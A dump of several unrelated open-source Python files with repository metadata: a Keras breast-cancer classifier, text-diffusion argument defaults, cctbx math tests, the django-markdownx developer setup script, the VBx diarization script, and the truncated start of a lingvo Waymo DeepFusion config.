| 3,552
|
py
|
175-breast_cancer_without_PCA.py
|
# https://youtu.be/e2sM7ccaA9c
"""
Using....
https://archive.ics.uci.edu/ml/datasets/Breast+Cancer+Wisconsin+(Diagnostic)
"""
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout
df = pd.read_csv("data/wisconsin_breast_cancer_dataset.csv")
print(df.describe().T) #Values need to be normalized before fitting.
print(df.isnull().sum())
#df = df.dropna()
#Rename Dataset to Label to make it easy to understand
df = df.rename(columns={'Diagnosis':'Label'})
print(df.dtypes)
#Understand the data
#sns.countplot(x="Label", data=df) #M - malignant B - benign
####### Replace categorical values with numbers########
df['Label'].value_counts()
#Define the dependent variable that needs to be predicted (labels)
y = df["Label"].values
# Encoding categorical data
from sklearn.preprocessing import LabelEncoder
labelencoder = LabelEncoder()
Y = labelencoder.fit_transform(y) # M=1 and B=0
#################################################################
#Define x and normalize values
#Define the independent variables. Let's also drop Gender, so we can normalize other data
X = df.drop(labels = ["Label", "ID"], axis=1)
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(X)
X = scaler.transform(X)
#Split data into train and test to verify accuracy after fitting the model.
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.25, random_state=42)
####################################################################
#Simple network 1
# Appropriate architecture for the challenge
model = Sequential()
model.add(Dense(16, input_dim=30, activation='relu'))
model.add(Dropout(0.2))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='adam', #also try adam
metrics=['accuracy'])
#model.compile(loss='mean_squared_error', optimizer='adam')
print(model.summary())
###########################################################
import datetime
start = datetime.datetime.now()
# # fit the model
history = model.fit(X_train, y_train ,verbose=1, epochs=100, batch_size=64,
validation_data=(X_test, y_test))
end = datetime.datetime.now()
print("Total execution time is: ", end-start)
_, acc = model.evaluate(X_test, y_test)
print("Accuracy = ", (acc * 100.0), "%")
#plot the training and validation accuracy and loss at each epoch
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(loss) + 1)
plt.plot(epochs, loss, 'y', label='Training loss')
plt.plot(epochs, val_loss, 'r', label='Validation loss')
plt.title('Training and validation loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
plt.plot(epochs, acc, 'y', label='Training acc')
plt.plot(epochs, val_acc, 'r', label='Validation acc')
plt.title('Training and validation accuracy')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()
# Predicting the Test set results
y_pred = model.predict(X_test)
y_pred = (y_pred > 0.5)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
sns.heatmap(cm, annot=True)
|
3f0d14dc4106c43282724ed930f972ead629d0d8
|
24f10a85b5eaffd7619b6095ce1ae66dbfabe85e
|
/src/utils/args_utils.py
|
1e9b060c694fc674d782f375654a946aac002f44
|
[
"MIT"
] |
permissive
|
madaan/minimal-text-diffusion
|
7f2aa8ce21effa25e1f86f917c32d49576a2f1ec
|
9303ffd481a2f647da24c6053e4dec44fd086a8d
|
refs/heads/main
| 2023-05-25T17:07:21.803835
| 2023-05-11T12:19:55
| 2023-05-11T12:19:55
| 539,045,602
| 199
| 17
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,524
|
py
|
args_utils.py
|
"""
Utilities for command line arguments.
"""
import argparse
def create_argparser():
defaults = dict(
data_dir="",
schedule_sampler="uniform",
lr=1e-4,
weight_decay=0.0,
lr_anneal_steps=30000,
batch_size=1,
microbatch=-1, # -1 disables microbatches
ema_rate="0.9999", # comma-separated list of EMA values
log_interval=50,
save_interval=25000,
resume_checkpoint="",
use_fp16=False,
fp16_scale_growth=1e-3,
seed=101,
gradient_clipping=-1.0,
eval_interval=2000,
checkpoint_path="diff_models",
train_txt_path="data/quotes_train.txt",
val_txt_path="data/quotes_valid.txt",
dataset="",
notes="",
)
text_defaults = dict(
modality="text",
emb_scale_factor=1.0,
in_channel=16,
out_channel=16,
noise_level=0.0,
cache_mode="no",
use_bert_tokenizer="no",
padding_mode="block",
preprocessing_num_workers=1,
tok_thresh=150
)
guided_generation_defaults = dict(
classifier_num_epochs=15
)
defaults.update(model_and_diffusion_defaults())
defaults.update(text_defaults)
defaults.update(guided_generation_defaults)
defaults.update(decoding_defaults())
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
add_dict_to_argparser(parser, defaults)
return parser
def model_and_diffusion_defaults():
"""
Defaults for text-diffusion model training.
"""
return dict(
sequence_len=64,
num_channels=16,
num_heads=4,
dropout=0.0,
learn_sigma=False,
sigma_small=False,
class_cond=False,
diffusion_steps=10000,
noise_schedule="linear",
timestep_respacing="",
use_kl=False,
predict_xstart=False,
rescale_timesteps=True,
rescale_learned_sigmas=True,
use_checkpoint=False,
model_arch="transformer",
in_channel=16,
out_channel=16,
vocab_size=66,
config_name="bert-base-uncased",
logits_mode=1,
training_mode="diffusion-lm",
init_pretrained=False,
freeze_embeddings=False,
use_pretrained_embeddings=True,
)
def decoding_defaults():
return dict(
num_samples=50,
top_p=0.9,
out_dir="",
model_name_or_path="",
checkpoint_path="",
use_ddim=False,
clip_denoised=False,
batch_size=64,
mbr_sample=1,
verbose="yes",
clamp="clamp",
preprocessing_num_workers=1,
emb_scale_factor=1.0,
classifier_path="",
)
def add_dict_to_argparser(parser, default_dict):
for k, v in default_dict.items():
v_type = type(v)
if v is None:
v_type = str
elif isinstance(v, bool):
v_type = str2bool
parser.add_argument(f"--{k}", default=v, type=v_type)
def args_to_dict(args, keys):
return {k: getattr(args, k) for k in keys}
def str2bool(v):
"""
https://stackoverflow.com/questions/15008758/parsing-boolean-values-with-argparse
"""
if isinstance(v, bool):
return v
if v.lower() in ("yes", "true", "t", "y", "1"):
return True
elif v.lower() in ("no", "false", "f", "n", "0"):
return False
else:
raise argparse.ArgumentTypeError("boolean value expected")
|
ceaf8e6539c1a96cad5bff56e27a6c9c4d53c78a
|
5b6ba0f288b1e2ac236af846a9bf546a63228476
|
/libtbx/tst_math_utils.py
|
92824c8642b81f477d46450799f1cec626f27471
|
[
"BSD-3-Clause-LBNL"
] |
permissive
|
cctbx/cctbx_project
|
5b547b416cadbdf95cca21dace9f54272a08d98a
|
7f4dfb6c873fd560920f697cbfd8a5ff6eed82fa
|
refs/heads/master
| 2023-08-17T17:44:05.077010
| 2023-08-16T22:40:22
| 2023-08-16T22:40:22
| 39,508,026
| 206
| 131
|
NOASSERTION
| 2023-09-14T17:12:55
| 2015-07-22T13:36:27
|
Python
|
UTF-8
|
Python
| false
| false
| 5,324
|
py
|
tst_math_utils.py
|
from __future__ import absolute_import, division, print_function
from libtbx.test_utils import approx_equal
from six.moves import range
def exercise_integer():
from libtbx.math_utils import iround, iceil, ifloor, nearest_integer
assert iround(0) == 0
assert iround(1.4) == 1
assert iround(-1.4) == -1
assert iround(1.6) == 2
assert iround(-1.6) == -2
assert iceil(0) == 0
assert iceil(1.1) == 2
assert iceil(-1.1) == -1
assert iceil(1.9) == 2
assert iceil(-1.9) == -1
assert ifloor(0) == 0
assert ifloor(1.1) == 1
assert ifloor(-1.1) == -2
assert ifloor(1.9) == 1
assert ifloor(-1.9) == -2
for i in range(-3,3+1):
assert nearest_integer(i+0.3) == i
assert nearest_integer(i+0.7) == i+1
def exercise_logical():
from libtbx.math_utils import does_imply, are_equivalent
#
assert does_imply(True, True)
assert not does_imply(True, False)
assert does_imply(False, True)
assert does_imply(False, False)
#
assert are_equivalent(True, True)
assert not are_equivalent(True, False)
assert not are_equivalent(False, True)
assert are_equivalent(False, False)
def exercise_nested_loop():
from libtbx.math_utils import nested_loop as nl
assert [list(i) for i in nl([])] == []
assert [list(i) for i in nl([1])] == [[0]]
assert [list(i) for i in nl([1], open_range=False)] == [[0], [1]]
assert [list(i) for i in nl([3])] == [[0], [1], [2]]
assert [list(i) for i in nl(begin=[-2], end=[3])] == [
[-2], [-1], [0], [1], [2]]
assert [list(i) for i in nl(begin=[-1], end=[1], open_range=False)] == [
[-1], [0], [1]]
assert [list(i) for i in nl(begin=[-2,4], end=[3,6])] == [
[-2, 4], [-2, 5], [-1, 4], [-1, 5], [0, 4], [0, 5], [1, 4], [1, 5],
[2, 4], [2, 5]]
assert [list(i) for i in nl(begin=[-2,4], end=[3,6], open_range=False)] == [
[-2, 4], [-2, 5], [-2, 6], [-1, 4], [-1, 5], [-1, 6], [0, 4], [0, 5],
[0, 6], [1, 4], [1, 5], [1, 6], [2, 4], [2, 5], [2, 6], [3, 4], [3, 5],
[3, 6]]
assert [list(i) for i in nl(begin=[-1,0,-1], end=[1,2,1])] == [
[-1, 0, -1], [-1, 0, 0], [-1, 1, -1], [-1, 1, 0], [0, 0, -1], [0, 0, 0],
[0, 1, -1], [0, 1, 0]]
def exercise_next_permutation():
from libtbx.math_utils import next_permutation
seq = []
assert next_permutation(seq) is False
seq = [0]
assert next_permutation(seq) is False
seq = [0,1]
assert next_permutation(seq)
assert seq == [1, 0]
assert not next_permutation(seq)
assert seq == [0, 1]
seq = [0,1,2]
result = []
while True:
result.append(tuple(seq))
if (not next_permutation(seq)):
break
assert result == [
(0, 1, 2),
(0, 2, 1),
(1, 0, 2),
(1, 2, 0),
(2, 0, 1),
(2, 1, 0)]
assert seq == [0,1,2]
expected_n = 1
for m in range(1,7):
expected_n *= m
seq = list(range(m))
n = 0
while True:
n += 1
if (not next_permutation(seq)):
break
assert seq == list(range(m))
assert n == expected_n
def exercise_random_permutation_in_place():
from libtbx.math_utils import random_permutation_in_place
import random
random.seed(0)
l = list(range(8))
for i_trial in range(10):
random_permutation_in_place(list=l)
if (l != list(range(8))):
break
else:
raise AssertionError
assert sorted(l) == list(range(8))
def exercise_prime_factors_of():
from libtbx.math_utils import prime_factors_of
assert prime_factors_of(n=1) == []
prime_set = set()
for n in range(2, 100):
primes = prime_factors_of(n)
pp = 1
for p in primes:
pp *= p
assert pp == n
prime_set.update(primes)
if (n == 30):
assert prime_set == set([2,3,5,7,11,13,17,19,23,29])
for n in prime_set:
assert prime_factors_of(n) == [n]
assert len(prime_set) == 25
def exercise_normalize_angle():
from libtbx.math_utils import normalize_angle as n
import math
for deg,period in [(False, 2*math.pi), (True, 360.)]:
assert approx_equal(n(0, deg=deg), 0, eps=1.e-12)
assert approx_equal(n(1.e-8, deg=deg), 1.e-8, eps=1.e-12)
assert approx_equal(n(-1.e-8, deg=deg), period-1.e-8, eps=1.e-12)
assert approx_equal(n(1, deg=deg), 1, eps=1.e-12)
assert approx_equal(n(-1, deg=deg), period-1, eps=1.e-12)
assert approx_equal(n(1.e+8), 1.9426951384)
assert approx_equal(n(-1.e+8), 4.34049016878)
assert approx_equal(n(1.e+8, deg=True), 280)
assert approx_equal(n(-1.e+8, deg=True), 80)
def exercise_percentile_based_spread():
from libtbx.math_utils import percentile_based_spread
import random
import math
n_points = 123456
deltas = []
for i in range(n_points):
x = random.gauss(100, 10)
deltas.append(x)
for i in range(1000):
x = random.gauss(300, 30)
deltas.append(x)
pbs = percentile_based_spread(deltas)
pbs_1 = percentile_based_spread(deltas, sort = False)
assert abs(pbs - pbs_1) < 0.01
rmsd = math.sqrt(sum([ x**2 for x in deltas]) / n_points)
assert (pbs > 100) and (pbs < rmsd)
# Test small list processing
assert percentile_based_spread([1,1]) > 0
def exercise():
exercise_integer()
exercise_logical()
exercise_nested_loop()
exercise_next_permutation()
exercise_random_permutation_in_place()
exercise_prime_factors_of()
exercise_normalize_angle()
exercise_percentile_based_spread()
print("OK")
if (__name__ == "__main__"):
exercise()
|
4451b4484319a5e8de4800677e5e1e395261aebe
|
fbea75f1590a1743da593c067d563324588f0725
|
/dev.py
|
2ea3080fb0a6d53700b52c3313ba12616d0c29c2
|
[
"BSD-2-Clause-Views"
] |
permissive
|
neutronX/django-markdownx
|
5b30f4e4920444fbcc9c45db5ed06304f9e21371
|
f02caa69cbdfe11e14182d9a5c003de92eb91822
|
refs/heads/master
| 2023-08-13T17:54:22.973593
| 2023-03-31T10:40:55
| 2023-03-31T10:40:55
| 26,052,435
| 713
| 166
|
NOASSERTION
| 2023-09-10T23:56:31
| 2014-11-01T14:15:37
|
Python
|
UTF-8
|
Python
| false
| false
| 11,427
|
py
|
dev.py
|
# -*- coding: utf-8 -*-
"""
usage: dev.py [-h] (-v | -d | -c | -run-vagrant | -run-docker | -no-container)
[--with-docs] [--with-npm-settings]
optional arguments:
-h, --help show this help message and exit
-v, --vagrant Install Vagrant development environment (requires
Vagrant).
-d, --docker Install Docker development environment (requires
Docker).
-c, --clean Clean up the development files (only the ones that have
been automatically created).
-run-vagrant Run vagrant development environment (runs --vagrant if
the files don't already exist). Vagrant must be
installed on your machine.
-run-docker Run vagrant development environment (runs --vagrant if
the files don't already exist). Docker must already be
installed on your machine, and Docker Daemon must be up
and running.
-no-container Run vagrant development environment (runs --vagrant if
the files don't already exist).
--with-docs Install documentation development environment.
--with-npm-settings Install npm installation environment for front-end
(TypeScript) development (requires node.js and npm).
Copyright (c) 2017, Django MarkdownX - Adi, Pouria Hadjibagheri.
"""
# Python's internal libraries:
from __future__ import unicode_literals
from os.path import join as join_path, dirname, abspath, exists, splitext
from os import remove, chmod, stat
from stat import S_IEXEC
from sys import executable as python_path
from sys import exit as sys_exit
# Third party libraries:
try:
from pip._internal import main as pip_main
except ImportError: # pip < 10
from pip import main as pip_main
BASE_DIR = dirname(abspath(__file__))
DEV_XML_FILE = 'dev.xml'
XML_FILE_ABSOLUTE_PATH = join_path(BASE_DIR, DEV_XML_FILE)
pypi_packages = {
'mkdocs',
'pymdown-extensions',
}
bash_commands = {
'vagrant': (
'cd {path}'.format(path=BASE_DIR),
'vagrant up',
'vagrant ssh -c "/home/vagrant/.virtualenvs/django-markdownx/bin/python -u '
'/srv/django-markdownx/manage.py runserver 0.0.0.0:8000"'
),
'docs': (
'mkdocs build',
),
'docker': (
'docker-compose build',
'docker-compose up -d'
)
}
def quiz(question, options, max_attempts=3):
from collections import Counter
count = Counter([item[0] for item in options])
if max(count.values()) > 1:
raise ValueError(
'Multiple options start with '
'character "{}".'.format(max(count, lambda x: count[x]))
)
current_attempt = 0
opts = tuple(key[0] for key in options)
opts_str = str.join(
', ',
('[{}]{}'.format(key, options[index][1:]) for index, key in enumerate(opts))
)
while current_attempt < max_attempts:
try:
response = input(
'> {question}\n'
' {opts} (ctrl+c to cancel): '.format(question=question, opts=opts_str)
)
if response.strip() in opts:
return options[opts.index(response.strip())]
print('\nInvalid response.')
current_attempt += 1
except KeyboardInterrupt:
print('\nOperation cancelled by the user. Exited with code 0.')
sys_exit(0)
else:
print(
'\nFailed {} attempts. Operation cancelled, '
'exited with code 1.'.format(max_attempts)
)
sys_exit(1)
def yes_no_quiz(question, max_attempts=3):
response = quiz(
question=question,
options=('Yes', 'No'),
max_attempts=max_attempts
)
return response == 'Yes'
def replace_contents_or_not(path):
replace_response = 'override and update the default'
replace_or_override = dict(
question='Contents of the existing "{}" and default values don\'t match. '
'Would you like to...\n'.format(path),
options=(
'override and update the default',
'replace changes with the default'
)
)
return quiz(**replace_or_override) == replace_response
def from_terminal(subject):
from subprocess import run as run_bash
from shlex import split as shlex_split
for command in bash_commands[subject]:
print('> EXECUTING:', command)
run_bash(shlex_split(command), timeout=None, check=True)
return True
def create_files(name):
from xml.etree.ElementTree import parse
from xml.sax.saxutils import escape, unescape
contents_xml = parse(XML_FILE_ABSOLUTE_PATH)
root = contents_xml.getroot()
for file in root:
if name in file.attrib['for'].split(';'):
relative_path = [node.text for node in file.iterfind('path')]
absolute_path = join_path(BASE_DIR, *relative_path)
display_path = join_path('markdownx', *relative_path)
template_contents = file.find('contents').text
if exists(absolute_path):
with open(absolute_path, mode='r') as data_file:
file_io = data_file.read()
contents_identical = template_contents.strip() == escape(file_io.strip())
if not contents_identical and replace_contents_or_not(display_path):
file.find('contents').text = escape(file_io)
elif not contents_identical:
with open(absolute_path, mode='w') as file_io:
file_io.write(unescape(template_contents) + '\n')
print('> REPLACED with default:', display_path)
else:
with open(absolute_path, mode='w') as target_file:
target_file.write(unescape(template_contents))
print('> CREATED:', display_path)
if splitext(absolute_path)[1] == '.sh' or absolute_path.endswith('manage.py'):
st = stat(absolute_path)
chmod(absolute_path, st.st_mode | S_IEXEC)
contents_xml.write(
file_or_filename=XML_FILE_ABSOLUTE_PATH,
xml_declaration=True,
encoding='UTF-8',
method='xml'
)
return True
def delete(abs_path, disp_path):
try:
remove(abs_path)
except IOError as error:
print('Failed to delete "{}"\n'.format(disp_path), error)
print('> REMOVED:', disp_path)
return True
def clean():
response = yes_no_quiz(
question="Are you sure you want to clean up "
"the developers' environment?"
)
if not response:
print('Exited at user\'s request with code 0.')
sys_exit(0)
from xml.etree.ElementTree import parse
from xml.sax.saxutils import escape
contents_xml = parse(XML_FILE_ABSOLUTE_PATH)
root = contents_xml.getroot()
for file in root:
relative_path = [node.text for node in file.iterfind('path')]
absolute_path = join_path(BASE_DIR, *relative_path)
display_path = join_path('markdownx', *relative_path)
if not exists(absolute_path):
continue
with open(absolute_path, mode='r') as data_file:
file_content = data_file.read()
if file.find('contents').text.strip() == escape(file_content.strip()):
delete(absolute_path, display_path)
continue
if replace_contents_or_not(display_path):
file.find('contents').text = escape(file_content)
print('> UPDATED in default setting:', display_path)
delete(absolute_path, display_path)
continue
delete(absolute_path, display_path)
delete(join_path(BASE_DIR, 'db.sqlite3'), 'db.sqlite3')
contents_xml.write(
file_or_filename=XML_FILE_ABSOLUTE_PATH,
xml_declaration=True,
encoding='UTF-8',
method='xml'
)
return True
def docs():
subject = 'docs'
create_files(subject)
pip_install(*pypi_packages)
return from_terminal(subject)
def vagrant():
subject = 'vagrant'
return create_files(subject)
def run_vagrant():
subject = 'vagrant'
vagrant()
return from_terminal(subject)
def docker():
subject = 'docker'
return create_files(subject)
def run_docker():
subject = 'docker'
docker()
return from_terminal(subject)
def npm():
subject = 'npm'
return create_files(subject)
def no_container():
subject = 'no-container'
return create_files(subject)
def pip_install(*packages):
for package in packages:
pip_main(['install', package])
return True
def main():
import argparse
from datetime import datetime
parser = argparse.ArgumentParser(
description='Welcome to Django MarkdownX Developers\' Environment.',
epilog=(
"Copyright (c) {}, Django MarkdownX - "
"Adi, Pouria Hadjibagheri.".format(
datetime.now().strftime('%Y')
)
)
)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'-v',
'--vagrant',
action='store_const',
const=vagrant,
dest='run',
help='Install Vagrant development environment (requires Vagrant).'
)
group.add_argument(
'-d',
'--docker',
action='store_const',
dest='run',
const=docker,
help='Install Docker development environment (requires Docker).'
)
group.add_argument(
'-c',
'--clean',
action='store_const',
const=clean,
dest='run',
help='Clean up the development files (only the ones that '
'have been automatically created).'
)
group.add_argument(
'-run-vagrant',
action='store_const',
dest='run',
const=run_vagrant,
help='Run vagrant development environment '
'(runs --vagrant if the files don\'t already exist). '
'Vagrant must be installed on your machine.'
)
group.add_argument(
'-run-docker',
action='store_const',
dest='run',
const=run_docker,
help='Run docker development environment '
'(runs --docker if the files don\'t already exist). '
'Docker must already be installed on your machine, and '
'Docker Daemon must be up and running.'
)
group.add_argument(
'-no-container',
action='store_const',
dest='run',
const=no_container,
help='Create development files without a container-based '
'development environment (creates "manage.py" and "runtests.py").'
)
parser.add_argument(
'--with-docs',
action='store_const',
const=docs,
dest='run',
help='Install documentation development environment.'
)
parser.add_argument(
'--with-npm-settings',
action='store_const',
const=npm,
dest='run',
help='Install npm installation environment for front-end '
'(TypeScript) development (requires node.js and npm).'
)
parser.parse_args().run()
return parser
if __name__ == '__main__':
main()
|
099c2530fd8ad7e8b9385663e114a15178ea8075
|
de8cecd17d1d8a06532fb59d160faa18de855f12
|
/VBx/vbhmm.py
|
380ce3e049c0d4992a3ca6ce360ccf6ab93f3d1b
|
[
"Apache-2.0"
] |
permissive
|
BUTSpeechFIT/VBx
|
df8bc3bf537e8206e7904830421c994d50e39255
|
7dfa3fab81c36b144cde9647fc80d96c0261a772
|
refs/heads/master
| 2023-03-06T17:40:30.329947
| 2023-02-23T08:07:16
| 2023-02-23T08:07:16
| 239,834,186
| 213
| 63
| null | 2023-02-23T08:07:17
| 2020-02-11T18:27:11
|
Python
|
UTF-8
|
Python
| false
| false
| 8,796
|
py
|
vbhmm.py
|
#!/usr/bin/env python
# @Authors: Lukas Burget, Mireia Diez, Federico Landini, Jan Profant
# @Emails: burget@fit.vutbr.cz, mireia@fit.vutbr.cz, landini@fit.vutbr.cz, jan.profant@phonexia.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The recipe consists in doing Agglomerative Hierachical Clustering on
# x-vectors in a first step. Then, Variational Bayes HMM over x-vectors
# is applied using the AHC output as args.initialization.
#
# A detailed analysis of this approach is presented in
# F. Landini, J. Profant, M. Diez, L. Burget
# Bayesian HMM clustering of x-vector sequences (VBx) in speaker diarization:
# theory, implementation and analysis on standard tasks
# Computer Speech & Language, 2022
import argparse
import os
import itertools
import fastcluster
import h5py
import kaldi_io
import numpy as np
from scipy.cluster.hierarchy import fcluster
from scipy.spatial.distance import squareform
from scipy.special import softmax
from scipy.linalg import eigh
from diarization_lib import read_xvector_timing_dict, l2_norm, \
cos_similarity, twoGMMcalib_lin, merge_adjacent_labels, mkdir_p
from kaldi_utils import read_plda
from VBx import VBx
def write_output(fp, out_labels, starts, ends):
for label, seg_start, seg_end in zip(out_labels, starts, ends):
fp.write(f'SPEAKER {file_name} 1 {seg_start:03f} {seg_end - seg_start:03f} '
f'<NA> <NA> {label + 1} <NA> <NA>{os.linesep}')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--init', required=True, type=str,
choices=['AHC', 'AHC+VB'],
help='AHC for using only AHC or AHC+VB for VB-HMM '
'after AHC initilization', )
parser.add_argument('--out-rttm-dir', required=True, type=str,
help='Directory to store output rttm files')
parser.add_argument('--xvec-ark-file', required=True, type=str,
help='Kaldi ark file with x-vectors from one or more '
'input recordings. Attention: all x-vectors from '
'one recording must be in one ark file')
parser.add_argument('--segments-file', required=True, type=str,
help='File with x-vector timing info. See '
'diarization_lib.read_xvector_timing_dict')
parser.add_argument('--xvec-transform', required=True, type=str,
help='path to x-vector transformation h5 file')
parser.add_argument('--plda-file', required=True, type=str,
help='File with PLDA model in Kaldi format used for '
'AHC and VB-HMM x-vector clustering')
parser.add_argument('--threshold', required=True, type=float,
help='args.threshold (bias) used for AHC')
parser.add_argument('--lda-dim', required=True, type=int,
help='For VB-HMM, x-vectors are reduced to this '
'dimensionality using LDA')
parser.add_argument('--Fa', required=True, type=float,
help='Parameter of VB-HMM (see VBx.VBx)')
parser.add_argument('--Fb', required=True, type=float,
help='Parameter of VB-HMM (see VBx.VBx)')
parser.add_argument('--loopP', required=True, type=float,
help='Parameter of VB-HMM (see VBx.VBx)')
parser.add_argument('--target-energy', required=False, type=float,
default=1.0,
help='Parameter affecting AHC if the similarity '
'matrix is obtained with PLDA. See '
'diarization_lib.kaldi_ivector_plda_scoring_dense')
parser.add_argument('--init-smoothing', required=False, type=float,
default=5.0,
help='AHC produces hard assignments of x-vetors to '
'speakers. These are "smoothed" to soft '
'assignments as the args.initialization for '
'VB-HMM. This parameter controls the amount of '
'smoothing. Not so important, high value '
'(e.g. 10) is OK => keeping hard assigment')
parser.add_argument('--output-2nd', required=False, type=bool, default=False,
help='Output also second most likely speaker of VB-HMM')
args = parser.parse_args()
assert 0 <= args.loopP <= 1, f'Expecting loopP between 0 and 1, got {args.loopP} instead.'
# segments file with x-vector timing information
segs_dict = read_xvector_timing_dict(args.segments_file)
kaldi_plda = read_plda(args.plda_file)
plda_mu, plda_tr, plda_psi = kaldi_plda
W = np.linalg.inv(plda_tr.T.dot(plda_tr))
B = np.linalg.inv((plda_tr.T / plda_psi).dot(plda_tr))
acvar, wccn = eigh(B, W)
plda_psi = acvar[::-1]
plda_tr = wccn.T[::-1]
# Open ark file with x-vectors and in each iteration of the following
# for-loop read a batch of x-vectors corresponding to one recording
arkit = kaldi_io.read_vec_flt_ark(args.xvec_ark_file)
# group xvectors in ark by recording name
recit = itertools.groupby(arkit, lambda e: e[0].rsplit('_', 1)[0])
for file_name, segs in recit:
print(file_name)
seg_names, xvecs = zip(*segs)
x = np.array(xvecs)
with h5py.File(args.xvec_transform, 'r') as f:
mean1 = np.array(f['mean1'])
mean2 = np.array(f['mean2'])
lda = np.array(f['lda'])
x = l2_norm(lda.T.dot((l2_norm(x - mean1)).transpose()).transpose() - mean2)
if args.init == 'AHC' or args.init.endswith('VB'):
if args.init.startswith('AHC'):
# Kaldi-like AHC of x-vectors (scr_mx is matrix of pairwise
# similarities between all x-vectors)
scr_mx = cos_similarity(x)
# Figure out utterance specific args.threshold for AHC
thr, _ = twoGMMcalib_lin(scr_mx.ravel())
# output "labels" is an integer vector of speaker (cluster) ids
scr_mx = squareform(-scr_mx, checks=False)
lin_mat = fastcluster.linkage(
scr_mx, method='average', preserve_input='False')
del scr_mx
adjust = abs(lin_mat[:, 2].min())
lin_mat[:, 2] += adjust
labels1st = fcluster(lin_mat, -(thr + args.threshold) + adjust,
criterion='distance') - 1
if args.init.endswith('VB'):
# Smooth the hard labels obtained from AHC to soft assignments
# of x-vectors to speakers
qinit = np.zeros((len(labels1st), np.max(labels1st) + 1))
qinit[range(len(labels1st)), labels1st] = 1.0
qinit = softmax(qinit * args.init_smoothing, axis=1)
fea = (x - plda_mu).dot(plda_tr.T)[:, :args.lda_dim]
q, sp, L = VBx(
fea, plda_psi[:args.lda_dim],
pi=qinit.shape[1], gamma=qinit,
maxIters=40, epsilon=1e-6,
loopProb=args.loopP, Fa=args.Fa, Fb=args.Fb)
labels1st = np.argsort(-q, axis=1)[:, 0]
if q.shape[1] > 1:
labels2nd = np.argsort(-q, axis=1)[:, 1]
else:
raise ValueError('Wrong option for args.initialization.')
assert(np.all(segs_dict[file_name][0] == np.array(seg_names)))
start, end = segs_dict[file_name][1].T
starts, ends, out_labels = merge_adjacent_labels(start, end, labels1st)
mkdir_p(args.out_rttm_dir)
with open(os.path.join(args.out_rttm_dir, f'{file_name}.rttm'), 'w') as fp:
write_output(fp, out_labels, starts, ends)
if args.output_2nd and args.init.endswith('VB') and q.shape[1] > 1:
starts, ends, out_labels2 = merge_adjacent_labels(start, end, labels2nd)
output_rttm_dir = f'{args.out_rttm_dir}2nd'
mkdir_p(output_rttm_dir)
with open(os.path.join(output_rttm_dir, f'{file_name}.rttm'), 'w') as fp:
write_output(fp, out_labels2, starts, ends)
|
017e16201515687d06c02b438c5b4e0d1f20d5d2
|
5c3296ff65e5a07852ff9dad1cc5e07991d08270
|
/lingvo/tasks/car/params/waymo_deepfusion.py
|
5aa56b6af524e852849e15f09028569d1542547c
|
[
"Apache-2.0"
] |
permissive
|
tensorflow/lingvo
|
dee164ef6e69edb352f2e855660b9b5227ddcf6f
|
c00a74b260fcf6ba11199cc4a340c127d6616479
|
refs/heads/master
| 2023-09-01T22:08:55.758781
| 2023-08-30T00:50:34
| 2023-08-30T00:51:26
| 142,219,189
| 2,963
| 485
|
Apache-2.0
| 2023-09-07T00:52:48
| 2018-07-24T22:30:28
|
Python
|
UTF-8
|
Python
| false
| false
| 32,044
|
py
|
waymo_deepfusion.py
|
# Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train deepfusion models on Waymo."""
import os
from lingvo import model_registry
from lingvo.core import activations
from lingvo.core import base_model_params
from lingvo.core import cluster_factory
from lingvo.core import hyperparams
from lingvo.core import optimizer
from lingvo.core import py_utils
from lingvo.tasks.car import deep_fusion
from lingvo.tasks.car import input_preprocessors
from lingvo.tasks.car import kitti_ap_metric
from lingvo.tasks.car import lr_util
from lingvo.tasks.car import pillars
from lingvo.tasks.car import pillars_anchor_free
from lingvo.tasks.car.params import waymo as waymo_params
from lingvo.tasks.car.waymo import waymo_decoder
from lingvo.tasks.car.waymo import waymo_metadata
from lingvo.tasks.car.waymo import waymo_open_input_generator
import numpy as np
# Set $WAYMO_DIR to the base path of where all the WAYMO files can be found.
_WAYMO_BASE = os.environ.get('WAYMO_DIR', 'FILL-ME-IN')
################## DeepFusion #############################
def _FilterKeepLabels(params, label_names):
"""Keep only label names in 'label_names' from input."""
metadata = waymo_metadata.WaymoMetadata()
filtered_labels = [
metadata.ClassNames().index(label_name) for label_name in label_names
]
params.extractors.labels.filter_labels = filtered_labels
def _NestedMapToParams(nmap):
p = hyperparams.Params()
for k, v in nmap.FlattenItems():
p.Define(k, v, '')
return p
def AddKITTIMetric(params):
"""Append the KITTI evaluation metrics to the list metrics run."""
p = params.Copy()
p.output_decoder.extra_ap_metrics = {
# We use the configuration for the Waymo dataset for evaluating
# with the KITTI evaluation code.
'kitti':
kitti_ap_metric.KITTIAPMetrics.Params(waymo_metadata.WaymoMetadata())
}
return p
def TrainerInputParams(train_params_fn):
"""Returns input params called under the context of a trainer.
Args:
